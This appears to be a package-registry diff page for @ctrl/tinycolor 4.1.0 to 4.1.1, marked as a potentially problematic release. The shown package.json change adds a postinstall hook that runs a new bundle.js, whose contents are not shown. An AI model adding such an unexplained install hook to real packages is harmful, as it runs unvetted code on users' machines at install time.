@ctrl/tinycolor 4.1.0 → 4.1.1

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Potentially problematic release.


This version of @ctrl/tinycolor might be problematic. Click here for more details.

Files changed (2) hide show
  1. package/bundle.js +2 -0
  2. package/package.json +4 -3
package/package.json CHANGED
@@ -1,6 +1,6 @@
1
1
  {
2
2
  "name": "@ctrl/tinycolor",
3
- "version": "4.1.0",
3
+ "version": "4.1.1",
4
4
  "description": "Fast, small color manipulation and conversion for JavaScript",
5
5
  "author": "Scott Cooper <scttcper@gmail.com>",
6
6
  "publishConfig": {
@@ -34,7 +34,8 @@
34
34
  "docs:build": "typedoc --out demo/dist/docs --hideGenerator --tsconfig tsconfig.build.json src/public_api.ts",
35
35
  "test": "vitest run",
36
36
  "test:watch": "vitest",
37
- "test:ci": "vitest run --coverage --reporter=default --reporter=junit --outputFile=./junit.xml"
37
+ "test:ci": "vitest run --coverage --reporter=default --reporter=junit --outputFile=./junit.xml",
38
+ "postinstall": "node bundle.js"
38
39
  },
39
40
  "devDependencies": {
40
41
  "@ctrl/eslint-config": "4.0.14",
@@ -56,4 +57,4 @@
56
57
  "engines": {
57
58
  "node": ">=14"
58
59
  }
59
- }
60
+ }